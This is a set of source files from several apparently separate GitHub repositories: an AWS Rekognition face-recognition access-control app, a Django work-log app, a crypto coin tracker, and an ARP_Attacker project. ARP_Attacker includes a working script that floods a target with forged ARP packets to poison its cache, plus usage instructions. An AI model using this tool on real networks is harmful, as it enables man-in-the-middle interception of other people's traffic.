Reasons:')\n for reason in unindexedFace['Reasons']:\n print(' ' + reason)\n return len(response['FaceRecords'])\n\n# add face to collection\n def addPhoto(self, faceName):\n\n ###?????????????????????????????????????????????????????????????????????????????????????????????????????????\n f = open(\"tempUser\", \"r\")\n uname = f.readline()\n\n bucket = 'mosiusersbucket-'+uname\n collection_id = uname\n photo = faceName\n\n indexed_faces_count = self.add_faces_to_collection(\n bucket, photo, collection_id)\n if indexed_faces_count != 0:\n print(\"Faces indexed count: \" + str(indexed_faces_count))\n else:\n # ????????\n print(\"User already exist, not added to bucket as key for bucket is name\")\n # but still added to collection as the key is different, colllection uses faceid as key so similar face will not be added bu similar name will be added\n\n # if __name__ == \"__main__\":\n # main()\n\n # List photos in the collection\n\n # change the format of the names by removing _\n def fixNameFormat(self, name):\n n = name.split(\"_\")\n res = n[0] + \" \" + n[1]\n return res\n\n # check the authotization\n def checkAuthorization(self, name):\n n = name.split(\".\")\n aut = n[0]\n\n if aut.endswith('a'):\n return True\n else:\n return False\n\n def downloadImageFromS3(self, img, imgName):\n s3 = boto3.resource('s3', aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n s3.Bucket('mosiusersbucket-'+self.uname).download_file(img, imgName)\n\n def showEmpImage(self):\n if self.lboxEmpl.curselection():\n index = self.lboxEmpl.curselection()[0]\n\n folderPath = r'images'\n img_size = (200, 200)\n path = folderPath + '/' + 'imgE.jpg'\n\n # face key to to be searched\n f = self.bucketKeysEmp[index]\n\n # download the images\n self.downloadImageFromS3(f, path)\n\n openImg = Image.open(path)\n openImg.thumbnail(img_size, Image.ANTIALIAS)\n img = ImageTk.PhotoImage(openImg)\n self.theImage.config(image=img)\n self.theImage.image = img\n\n # self.theImage.place(x=282, y=476, height=130, width=150)\n else:\n messagebox.showerror('Name Not Selected',\n 'Select person from the list')\n\n\n\n def showBlackPhoto(self):\n if self.lboxBlack.curselection():\n index = self.lboxBlack.curselection()[0]\n\n folderPath = r'images'\n\n img_size = (200, 200)\n # path=folderPath+'/'+fileNames[index]\n path = folderPath + '/' + 'imgB.jpg'\n\n # face key to to be searched\n f = self.bucketKeysBlack[index]\n\n # download the images\n self.downloadImageFromS3(f, path)\n\n openImg = Image.open(path)\n openImg.thumbnail(img_size, Image.ANTIALIAS)\n img = ImageTk.PhotoImage(openImg)\n self.theImageB.config(image=img)\n self.theImageB.image = img\n # self.theImageB.place(x=718, y=476, height=130, width=150)\n else:\n messagebox.showerror('Name Not Selected',\n 'Select person from the list')\n\n\n\n def list_faces_in_collection(self):\n\n #read the current user's username\n f = open(\"tempUser\", \"r\")\n self.uname = f.readline()\n f.close()\n\n collection_id = self.uname\n\n maxResults = 2\n faces_count = 0\n blacklist_count = 0\n tokens = True\n\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n if collection_id:\n\n response = client.list_faces(CollectionId=collection_id,\n MaxResults=maxResults)\n\n print('Faces in collection ' + collection_id)\n\n listOfPeople = ''\n blacklists = ''\n\n # this list will be used in upload function to make sure the same name doesn't exist in the bucket\n self.faceNameInBucket=[]\n # this stores the names/keys in s3 bucket in the format of Musie_Yemane_a.jpg\n self.bucketKeysEmp = []\n self.bucketKeysBlack = []\n\n # initiate a list to collect list of ID printed from 1 to ---\n self.faceID = [] # This is a normal list, we use function.listname name to make the list accessible by others\n # for black listed people to store their faceid to help us to delete them by id\n self.faceID2 = []\n c = 1\n # make the list boxes empty before loading updated data\n self.lboxEmpl.delete(0, END)\n self.lboxBlack.delete(0, END)\n while tokens:\n\n faces = response['Faces']\n for face in faces:\n print(face)\n tempName1 = 'empImages/' + str(c) + '.jpg'\n tempName2 = 'blackImages/' + str(c) + '.jpg'\n c = c + 1\n\n # check if the face is employee or blacklisted\n autho = self.checkAuthorization(face['ExternalImageId'])\n # removes the _ and make the correct names\n FullName = self.fixNameFormat(face['ExternalImageId'])\n\n self.faceNameInBucket.append(\n FullName) # This is to check if user with same name already registered in our record at the user creation\n\n if autho:\n self.lboxEmpl.insert(\n tk.END, ' ' + str(faces_count + 1) + '. ' + FullName)\n\n self.bucketKeysEmp.append(face[\n 'ExternalImageId']) # public list that stores the employees names/keys used in s3 bucket. eg Musie_Yemane_a.jpg\n\n listOfPeople = listOfPeople + \"\\n\" + \" \" + \\\n str(faces_count + 1) + \" \" + FullName\n self.faceID.append(face['FaceId'])\n faces_count += 1\n else:\n\n self.lboxBlack.insert(\n tk.END, ' ' + str(blacklist_count + 1) + '. ' + FullName)\n\n self.bucketKeysBlack.append(face[\n 'ExternalImageId']) # public list that stores the blacklisted names/keys used in s3 bucket. eg Musie_Yemane_a.jpg\n\n blacklists = blacklists + \"\\n\" + \" \" + \\\n str(blacklist_count + 1) + \" \" + FullName\n self.faceID2.append(face['FaceId'])\n blacklist_count += 1\n\n if 'NextToken' in response:\n nextToken = response['NextToken']\n response = client.list_faces(CollectionId=collection_id,\n NextToken=nextToken, MaxResults=maxResults)\n else:\n tokens = False\n\n\n # Delete photo from the bucket s3 amazon database, it uses the image name as key eg. Musie_Yemane_a.jpg\n def deletePhotoFromBucket(self, photoKey):\n client = boto3.resource('s3',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2'\n )\n\n client.Object('mosiusersbucket-'+self.uname, photoKey).delete()\n\n # delete photo in the collection\n def delete_faces_from_collection(self, collection_id, faces):\n client = boto3.client('rekognition',\n aws_access_key_id=access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n response = client.delete_faces(CollectionId=collection_id,\n FaceIds=faces)\n\n print(str(len(response['DeletedFaces'])) + ' faces deleted:')\n for faceId in response['DeletedFaces']:\n print(faceId)\n return len(response['DeletedFaces'])\n\n def deletePhoto(self):\n\n if self.lboxEmpl.curselection():\n # index of selected item in listbox of employees\n index = self.lboxEmpl.curselection()[0]\n # access the faceID from list faces in collection, which contains all the IDs indexed\n faceIdToBeDeleted = self.faceID[index]\n\n # delete face\n\n collection_id = self.uname\n faces = []\n faces.append(faceIdToBeDeleted) # deletes face from collection\n # delete photo from s3 bucket database\n self.deletePhotoFromBucket(self.bucketKeysEmp[index])\n\n faces_count = self.delete_faces_from_collection(\n collection_id, faces)\n\n print(\"deleted faces count: \" + str(faces_count))\n\n\n # remove photo from the screen\n self.theImage.config(image='')\n\n # Update the lis of users sored in the bucket and collection\n self.list_faces_in_collection()\n\n else:\n messagebox.showerror(\n \"Select a person\", \"Please Select Person to Delete\")\n print('Person not selected!!!')\n\n def deleteBlacklist(self):\n\n if self.lboxBlack.curselection():\n # index of selected item in listbox of blacklists\n index = self.lboxBlack.curselection()[0]\n # access the faceID from list faces in collection, which contains all the IDs indexed\n faceIdToBeDeleted = self.faceID2[index]\n\n # delete face\n collection_id = self.uname\n faces = []\n faces.append(faceIdToBeDeleted)\n\n # delete photo from bucket\n self.deletePhotoFromBucket(self.bucketKeysBlack[index])\n\n faces_count = self.delete_faces_from_collection(\n collection_id, faces)\n\n print(\"deleted faces count: \" + str(faces_count))\n\n # remove photo from the screen\n self.theImageB.config(image='')\n\n # Update the lis of users sored in the bucket and collection\n self.list_faces_in_collection()\n\n else:\n messagebox.showerror(\n \"Select a person\", \"Please Select Person to Delete\")\n print('Person not selected!!!')\n\n # validate enty to use only integers\n def validateInt(self, inp):\n if inp.isdigit():\n return True\n elif inp == \"\":\n return True\n else:\n return False\n\n # validate enty to use only alphabets\n def validateStr(self, inp):\n if inp.isalpha():\n return True\n elif inp == \"\":\n return True\n else:\n return False\n\n\n# class PageTwo(Frame):\n# \tdef __init__(self, parent, controller):\n# \t\tFrame.__init__(self, parent)\n#\n# \t\tlabel = Label(self, text=\"Page Two\")\n# \t\tlabel.pack(padx=10, pady=10)\n# \t\tstart_page = Button(self, text=\"Start Page\", command=lambda:controller.show_frame(StartPage))\n# \t\tstart_page.pack()\n# \t\tpage_one = Button(self, text=\"Page One\", command=lambda:controller.show_frame(PageOne))\n# \t\tpage_one.pack()\n\nclass MainMenu:\n def __init__(self, master):\n menubar = Menu(master)\n filemenu = Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Exit\", command=master.quit)\n menubar.add_cascade(label=\"File\", menu=filemenu)\n master.config(menu=menubar)\n\n\napp = App()\napp.mainloop()\n" }, { "alpha_fraction": 0.5122302174568176, "alphanum_fraction": 0.5326139330863953, "avg_line_length": 31.325580596923828, "blob_id": "5c6eeba6def0197d44c7d9b4f0eeeee22769f857", "content_id": "aba481d8617849c2ec4d122dbd3357caff78f819", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 166, "num_lines": 129, "path": "/face_recognition_system.py", "repo_name": "MusieYemane/Access-Control-using-AWS-Face-Rekognition-Service-in-Python", "src_encoding": "UTF-8", "text": "import dlib\nimport cv2\nfrom imutils.video import VideoStream\nimport imutils\nimport time\n\nimport boto3\n\n# with open('credentials.csv','r') as input:\n# next(input)\n# reader=csv.reader(input)\n# for line in reader:\n# access_key_id=line[2]\n# secret_access_key=line[3]\naccess_key_id = '**************' ##Enter your AWS access key id here for ex. 'AKIL4GOQL&QREDSFFUTQT'\nsecret_access_key = '*****************' ##Enter your AWS Secret access key here ex.'QS5W/xw5zdM6bcZwbz2ZYyLLQlmqdEibQIyn4L87'\n\n\ntempUser= open('tempUser', 'r')\ncol_id= tempUser.read()\ndef recognizeFace():\n photo= 'result.jpg'\n\n # client access for rekognition\n client=boto3.client('rekognition',\n aws_access_key_id = access_key_id,\n aws_secret_access_key=secret_access_key,\n region_name='us-east-2')\n\n\n # encode the image and get a response\n with open(photo, 'rb') as source_image:\n source_bytes= source_image.read()\n\n # # to use phot from the aws s3 storage, apply this code\n response= client.search_faces_by_image(\n CollectionId=col_id,\n Image={'Bytes': source_bytes}\n )\n\n # since response is a dictionary, we can loop it\n #print(response)\n return response\n\n \n\n\ndetector = dlib.get_frontal_face_detector()\n\nprint(\"->Starting Face Detection\")\nc = VideoStream(src=0).start() #For webcam, comment it if using Raspberry Pi Camera module\n# c = VideoStream(usePiCamera=True).start() #For Raspberry Pi Camera module, comment it if using webcam\n# time.sleep(2.0)\nwhile True:\n\n frame = c.read()\n # frame = imutils.resize(frame)\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n rects = detector(gray, 0)\n\n name = ''\n auth = ''\n\n if rects:\n cv2.imwrite('result.jpg',frame)\n print(\"face detected\")\n \n response= recognizeFace()\n\n for key, value in response.items():\n if key=='FaceMatches': #go to facematch key of the response dictionary\n if value: #check if faceMatch have value as list\n\n if(value[0]['Similarity']>80): # similarity of captured image and photo at collection should be greater than 80, just to make sure it is accurate\n print(key)\n\n information=value[0]['Face']['ExternalImageId'].split(\".\") # remove .jpg or .png\n\n info=information[0].split(\"_\") # split the names\n\n name=info[0]+\" \"+info[1]\n authorization=info[2]\n\n if authorization=='a':\n auth='Employee'\n print(\"Name: \"+ name,\"\\nAuthorization: Employee\")\n\n elif(authorization==\"b\"):\n auth='Blacklist'\n print(\"Name: \", name ,\"\\nAuthorization: Blacklist\")\n\n print(\"Similarity rate: \", value[0]['Similarity'],\n \"\\nFace ID from collection: \", value[0]['Face']['FaceId'],\n \"\\nImage ID captured photo: \", value[0]['Face']['ImageId'],\n # \"\\nImage Name: \", value[0]['Face']['ExternalImageId'], ###### note: we can put the name of the person and authorization here\n ) # value[0] is dictionary\n\n\n\n else: #if it is empty, then there is no simillary person\n name='Unknown Person'\n print(\"Unknown Person\")\n\n for rect in rects:\n x1 = rect.left()\n y1 = rect.top()-30\n x2 = rect.right()\n y2 = rect.bottom()\n frame = cv2.rectangle(frame, (x1, y1), (x2, y2), (0, 255, 0), 2)\n cv2.putText(frame, name, (x1, y1-50), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n cv2.putText(frame, auth, (x1, y1-30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)\n\n #time.sleep(50.0)\n\n\n cv2.imshow(\"Frame\", frame)\n if rects:\n cv2.waitKey(0)\n\n key = cv2.waitKey(1) & 0xFF\n \n\n if key == ord(\"q\"):\n break\n\ncv2.destroyAllWindows()\nc.stop()\n" } ]
3
VSpectrum/My_Logs
https://github.com/VSpectrum/My_Logs
ffc3adfca5bb22b628cfd958badf1a22179faa78
9df444ea89c8030ec8638057b661c0a7e2aa1812
ad3c845b93724fa37b88a09b0f776e3d5719bca0
refs/heads/master
2021-01-22T06:23:22.907453
2017-06-13T16:26:50
2017-06-13T16:26:50
92,547,716
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6912928819656372, "alphanum_fraction": 0.6939314007759094, "avg_line_length": 31.514286041259766, "blob_id": "07f3c55f43d86a7d5b46d02c090e043a54e2f03d", "content_id": "29c166bc322b46d617290b0a87d4bc64dce81f19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1137, "license_type": "no_license", "max_line_length": 92, "num_lines": 35, "path": "/mylogs/notes/views.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, HttpResponse\nfrom notes.models import Log\nfrom collections import OrderedDict\nfrom pprint import pprint\n# Create your views here.\ndef index(request):\n\tLogs = [x for x in Log.objects.all().order_by('order')]\n\tdict_dates = {}\n\n\tfor log in Logs:\n\t\ttry:\n\t\t\tif dict_dates[log.date]:\n\t\t\t\tdict_dates[log.date].append((log.logHours, log.logNote))\n\t\texcept:\n\t\t\tdict_dates[log.date] = [(log.logHours, log.logNote)]\n\tpprint(dict_dates)\n\tdata = {'Logs': OrderedDict(sorted(dict_dates.items(), key=lambda t: t[0], reverse=True)) }\n\treturn render(request,'logs.html', data)\n\ndef filter(request, filter_word):\n\tLogs = [x for x in Log.objects.filter(tags__name__in=[filter_word]).order_by('order')]\n\tdict_dates = {}\n\n\tfor log in Logs:\n\t\ttry:\n\t\t\tif dict_dates[log.date]:\n\t\t\t\tdict_dates[log.date].append((log.logHours, log.logNote))\n\t\texcept:\n\t\t\tdict_dates[log.date] = [(log.logHours, log.logNote)]\n\tpprint(dict_dates)\n\tdata = {'Logs': OrderedDict(sorted(dict_dates.items(), key=lambda t: t[0], reverse=True)) }\n\treturn render(request,'logs.html', data)" }, { "alpha_fraction": 0.6943620443344116, "alphanum_fraction": 0.7002967596054077, "avg_line_length": 29.68181800842285, "blob_id": "5974f520af3546ad0989868513328f4c215ed924", "content_id": "1d9b2bc0df2b9cbcb96f7976517e1dc964395d6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 674, "license_type": "no_license", "max_line_length": 77, "num_lines": 22, "path": "/mylogs/notes/models.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models\nfrom django.utils import timezone as datetime\nfrom taggit.managers import TaggableManager\n# Create your models here.\n\nclass Log(models.Model):\n logID = models.AutoField(primary_key=True)\n order = models.SmallIntegerField()\n logHours = models.DecimalField(default=0, max_digits=4, decimal_places=2)\n logNote = models.TextField(blank=False)\n date = models.DateField(default=datetime.now, blank=False)\n tags = TaggableManager()\n\n class Meta:\n verbose_name = 'Log'\n verbose_name_plural = 'Logs'\n\n def __str__(self):\n return str(self.logID)" }, { "alpha_fraction": 0.6792452931404114, "alphanum_fraction": 0.6816037893295288, "avg_line_length": 27.33333396911621, "blob_id": "0ffac56bcad2e24caca6937b282f7b1ad0456549", "content_id": "a9a714f116f2f9f71f248ea53908575fbf56bcf1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 424, "license_type": "no_license", "max_line_length": 59, "num_lines": 15, "path": "/mylogs/notes/admin.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.contrib import admin\n\n# Register your models here.\nfrom notes.models import Log\n\nclass LogDisplay(admin.ModelAdmin):\n def time_seconds(self, obj):\n return obj.date.strftime(\"%d-%b-%Y | %H:%M:%S\")\n time_seconds.short_description = 'Date'\n list_display = ('logHours', 'logNote', 'order', 'date')\n\nadmin.site.register(Log, LogDisplay)" }, { "alpha_fraction": 0.5888324975967407, "alphanum_fraction": 0.5989847779273987, "avg_line_length": 23.75, "blob_id": "0a0b468319cbce9b93b9c802e430f3a33a62b955", "content_id": "318384d99b2a62d6aa7e138b04dbd659b6e90c12", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 197, "license_type": "no_license", "max_line_length": 81, "num_lines": 8, "path": "/mylogs/notes/urls.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^(?P<filter_word>([A-Za-z0-9_\\.-]+))/$$', views.filter, name='filter'),\n]" }, { "alpha_fraction": 0.5431985259056091, "alphanum_fraction": 0.5808823704719543, "avg_line_length": 31.969696044921875, "blob_id": "698dd97bc9cfe4c067484114c0156262d4ef619e", "content_id": "ad7931aec9536a6c2d96f6bf86029df8bb6c99f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1088, "license_type": "no_license", "max_line_length": 170, "num_lines": 33, "path": "/mylogs/notes/migrations/0001_initial.py", "repo_name": "VSpectrum/My_Logs", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.1 on 2017-05-26 16:33\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.utils.timezone\nimport taggit.managers\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('taggit', '0002_auto_20150616_2121'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Log',\n fields=[\n ('logID', models.AutoField(primary_key=True, serialize=False)),\n ('logHours', models.DecimalField(decimal_places=2, default=0, max_digits=4)),\n ('logNote', models.CharField(max_length=10000)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('tags', taggit.managers.TaggableManager(help_text='A comma-separated list of tags.', through='taggit.TaggedItem', to='taggit.Tag', verbose_name='Tags')),\n ],\n options={\n 'verbose_name': 'Log',\n 'verbose_name_plural': 'Logs',\n },\n ),\n ]\n" } ]
5
lightningwm/ARP_Attacker
https://github.com/lightningwm/ARP_Attacker
381662d814a6f6930c1941f92d9d2cab44bf0845
2bde59ed23e5d9d2a92ec0aebeebcd4f557d1861
ce17230f6156ce1ae37ced0b664e243d3e6ff087
refs/heads/master
2020-04-27T21:06:00.401612
2019-03-09T11:12:33
2019-03-09T11:12:33
174,683,158
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7284768223762512, "alphanum_fraction": 0.7450330853462219, "avg_line_length": 29.200000762939453, "blob_id": "e700f10654da6ddfb8df114977640ce648b9525c", "content_id": "737e612c9dfbb8d3a61f8e2a8f47d64c2f4c6dab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 328, "license_type": "permissive", "max_line_length": 137, "num_lines": 10, "path": "/README.md", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": "UTF-8", "text": "# ARP_Attacker\nPython 3.5 kamene 0.32\n\nHow to use? pip install -r requirement.txt\n\nusage: main.py [-h] -t TARGETIP -tm TARGETMAC -g SRCIP -gm SRCMAC\n\nARP_Attacker\n\noptional arguments: -h, --help show this help message and exit -t TARGETIP 靶机IP -tm TARGETMAC 靶机MAC -g SRCIP 被毒化的IP -gm SRCMAC 被毒化IP对应MAC\n" }, { "alpha_fraction": 0.5797565579414368, "alphanum_fraction": 0.5848814845085144, "avg_line_length": 27.381818771362305, "blob_id": "bbaa22b243b1fe7b6ad17e6d788c383e1d1a207b", "content_id": "3ec69e57bc8e0f1c4d10ef9d4f11dc0b69a17256", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1791, "license_type": "permissive", "max_line_length": 89, "num_lines": 55, "path": "/main.py", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nfrom kamene.all import *\nfrom kamene.config import conf\n\nconf.ipv6_enabled = False\n\n\ndef attack(trgIP, trgMAC, srcIP, srcMAC):\n print('靶机IP %s' % trgIP)\n print('靶机MAC %s' % trgMAC)\n print('待修改的IP %s' % srcIP)\n print('待修改的IP对应MAC %s' % srcMAC)\n eth = Ether()\n arp = ARP(\n # 代表ARP请求或者响应\n op=\"who-has\",\n # 发送方Mac地址/毒化记录中的MAC\n hwsrc=str(srcMAC),\n # 发送方IP地址/毒化记录中的IP\n psrc=str(srcIP),\n # 目标Mac地址/被欺骗主机MAC\n hwdst=str(trgMAC),\n # 目标IP地址/被欺骗主机IP地址\n pdst=str(trgIP)\n )\n # print((eth / arp).show())\n print('ARP数据包信息')\n print(arp.show())\n sendp(eth / arp, inter=RandNum(10, 40), loop=1)\n\n\ndef usage():\n print(\n '''用法: ping [-h] [-a pdst hwdst psrc hwsrc]\n 选项:\n -h 使用帮助\n -a <pdst> <hwdst> <psrc> <hwsrc>\n ARP毒化 dpst:靶机IP hwdst:靶机MAC地址 psrc:被毒化的IP hwsrc:被毒化IP对应的MAC地址。\n '''\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='ARP_Attacker')\n parser.add_argument('-t', dest='targetIP', type=str, help='靶机IP', required=True)\n parser.add_argument('-tm', dest='targetMAC', type=str, help='靶机MAC', required=True)\n parser.add_argument('-g', dest='srcIP', type=str, help='被毒化的IP', required=True)\n parser.add_argument('-gm', dest='srcMAC', type=str, help='被毒化IP对应MAC', required=True)\n\n args = parser.parse_args()\n attack(args.targetIP, args.targetMAC, args.srcIP, args.srcMAC)\n sys.exit()\n" }, { "alpha_fraction": 0.4615384638309479, "alphanum_fraction": 0.692307710647583, "avg_line_length": 12, "blob_id": "d24e6ac3dd84b632f2b7a7f296576a93be63f20d", "content_id": "89ca9960bf007fe124dc93dbd22704ec123dd003", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 13, "license_type": "permissive", "max_line_length": 12, "num_lines": 1, "path": "/requirement.txt", "repo_name": "lightningwm/ARP_Attacker", "src_encoding": "UTF-8", "text": "kamene==0.32\n" } ]
3
ininjame/pythonproj
https://github.com/ininjame/pythonproj
d0c633da2f57c9061daaa77e1e15981268c36f34
4bb5d06501ef9a237d53ee4fbea1dae5a94d104e
fe9c1bf68f38c0afe779e9ba5ebdbad7aa9c0e53
refs/heads/master
2023-01-21T21:49:54.042671
2022-12-19T15:45:59
2022-12-19T15:45:59
139,323,097
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5204760432243347, "alphanum_fraction": 0.5505775213241577, "avg_line_length": 35.177215576171875, "blob_id": "c18c6c199beb60204622f0a0c872db5c7a807582", "content_id": "9ff49e72d9e8742bedb595e868243b0faad8dd3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2857, "license_type": "no_license", "max_line_length": 91, "num_lines": 79, "path": "/data_analysis/lib/calmapLib.py", "repo_name": "ininjame/pythonproj", "src_encoding": "UTF-8", "text": "# ----------------------------------------------------------------------------\n# A modified version of calendar heat map by author Nicolas P. Rougier\n# that accepts data of any size, has function to create input.\n# License: BSD\n# ----------------------------------------------------------------------------\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Polygon\nfrom datetime import datetime, timedelta\nfrom dateutil.relativedelta import relativedelta\n\n\ndef calmap(ax, year, data, col_map='RdYlBu'):\n ax.tick_params('x', length=0, labelsize=\"medium\", which='major')\n ax.tick_params('y', length=0, labelsize=\"x-small\", which='major')\n\n # Month borders\n xticks, labels = [], []\n start = datetime(year,1,1).weekday()\n for month in range(1,13):\n first = datetime(year, month, 1)\n last = first + relativedelta(months=1, days=-1)\n\n y0 = first.weekday()\n y1 = last.weekday()\n x0 = (int(first.strftime(\"%j\"))+start-1)//7\n x1 = (int(last.strftime(\"%j\"))+start-1)//7\n\n P = [ (x0, y0), (x0, 7), (x1, 7),\n (x1, y1+1), (x1+1, y1+1), (x1+1, 0),\n (x0+1, 0), (x0+1, y0) ]\n xticks.append(x0 +(x1-x0+1)/2)\n labels.append(first.strftime(\"%b\"))\n poly = Polygon(P, edgecolor=\"black\", facecolor=\"None\",\n linewidth=1, zorder=20, clip_on=False)\n ax.add_artist(poly)\n \n ax.set_xticks(xticks)\n ax.set_xticklabels(labels)\n ax.set_yticks(0.5 + np.arange(7))\n ax.set_yticklabels([\"Mon\", \"Tue\", \"Wed\", \"Thu\", \"Fri\", \"Sat\", \"Sun\"])\n ax.set_title(\"{}\".format(year), weight=\"semibold\")\n \n # Clearing first and last day from the data\n valid = datetime(year, 1, 1).weekday()\n data[:valid,0] = np.nan\n valid = datetime(year, 12, 31).weekday()\n # data[:,x1+1:] = np.nan\n data[valid+1:,x1] = np.nan\n\n # Showing data\n ax.imshow(data, extent=[0,53,0,7], zorder=10, vmin=0, vmax=int(np.nanmax(data)),\n cmap=col_map, origin=\"lower\", alpha=.75)\n\ndef create_input(data, year):\n\n def padding(series, year):\n \"\"\"\n Take pandas series, generate padding and return values as array\n \"\"\"\n days_before = (min(series.index) - datetime(year,1,1)).days\n days_after = ((datetime(year,1,1) + timedelta(days=370)) - max(series.index)).days \n pad_pre = np.empty(days_before)\n pad_pre.fill(np.nan)\n pad_post = np.empty(days_after)\n pad_post.fill(np.nan)\n\n return np.concatenate((pad_pre, series.values, pad_post))\n \n inp_raw = padding(data,year).reshape((53,7)).T\n first = datetime(year,1,1)\n dic = {}\n inp = []\n for i in range(7):\n date = first + timedelta(days=i)\n dic[date.weekday()] = inp_raw[i]\n for i in range(7):\n inp.append(dic[i])\n return np.array(inp)" } ]
1
AdamStormhardtGH/crypto_newcoins_tracker
https://github.com/AdamStormhardtGH/crypto_newcoins_tracker
395f0f23c95e14a1d67ddefea1be170f1792135a
a4d144aff1e8190edab5bfa114e4ae53cc1494ff
320822d0182f0c365b79bbde9e3c5c55845bbe94
refs/heads/master
2023-09-05T06:11:22.945747
2021-11-20T22:18:24
2021-11-20T22:18:24
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6836923360824585, "alphanum_fraction": 0.6966153979301453, "avg_line_length": 21.8873233795166, "blob_id": "13610dca0e21edb1d959ab87c40a7dc057c07f4a", "content_id": "b448e1fd1e7421afcde4485717e3e855a088c026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1625, "license_type": "no_license", "max_line_length": 86, "num_lines": 71, "path": "/src/sql/coin_recommendations.sql", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "/* \n\nProvide an overview for all coins, with key metrics:\n- first day added in db\n- latest day we have data for\n- average volume across the data we have\n- latest volume\n- TODO: week this coin belongs to once it's got 7 days or more of data\n- TODO: threshold met of 100m?\n\n*/\n\n-- View Example\nCREATE OR REPLACE VIEW coin_recommendations AS --create table \nSELECT distinct \n\nid, \nsymbol,\n\"name\",\nadded_date,\nextract(week from (added_date + INTERVAL '6' DAY)) as week_num,\n \nlatest_price,\nlatest_total_volumes,\naverage_total_volumes,\nlatest_date\n\n\n-- added_date + interval '24' hour as day_plus1,\n-- now() as now\n\n\n\nFROM \"coin_analysis\".\"watchlist\"\ninner join (\n select \n id as wlid,\n last_value(prices)\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_price,\n last_value(total_volumes)\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_total_volumes,\n last_value(\"date\")\n over(partition by id\n order by \"date\" \n rows between unbounded preceding and unbounded following) as latest_date\n \n \n \n \n from \"coin_analysis\".\"watched-coin-data\" \n \n \n ) latest_report on latest_report.wlid = \"coin_analysis\".\"watchlist\".id\n \n left join (\n \n select \n id as avg_id, \n avg(total_volumes) as average_total_volumes\n from \"coin_analysis\".\"watched-coin-data\" \n group by id\n ) average_report on average_report.avg_id = \"coin_analysis\".\"watchlist\".id\n \n\nwhere (added_date + interval '24' hour)< now()\nand latest_total_volumes > 1300000\nand latest_price < 0.003\n" }, { "alpha_fraction": 0.7262703776359558, "alphanum_fraction": 0.7535954117774963, "avg_line_length": 26.8266658782959, "blob_id": "12f64a15ff2a9e7f2d05a3aefc5340eb3ea0c28a", "content_id": "70664d9359a7517845382ff70eb09722a9808582", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2086, "license_type": "no_license", "max_line_length": 169, "num_lines": 75, "path": "/readme.md", "repo_name": "AdamStormhardtGH/crypto_newcoins_tracker", "src_encoding": "UTF-8", "text": "# overview\n\n\n\n\n## Job 1 - Pull Market list snapshot of all avaialable coins\n\n`marketsnapshot.get_market_snapshot()`\n\n1. Get list of all available coins ( /coins/list)\n2. add a timestamp for us to track dates\n3. output as json line delimited data to s3/gcp\n4. return success or failure\n\n## Job 2 - Compare with yesterday to find new coins\n\n`compareyesterday.compare_yesterday_and_today()`\n\nThis job will check the bucket path associated with the time of execution (UTC)\neg. if execution at midnight UTC on November 11, 2021, the path will look for:\n `<bucket>/marketlist/2021-11-11-coinlist.json` - today\n `<bucket>/marketlist/2021-11-10-coinlist.json` - yesterday\n\nTODO:\n- Fallback to prior day if path does not exist x3 days\n- graceful exit if no comparison date exists\n\n1. Loads today's market list snapshop based on execution 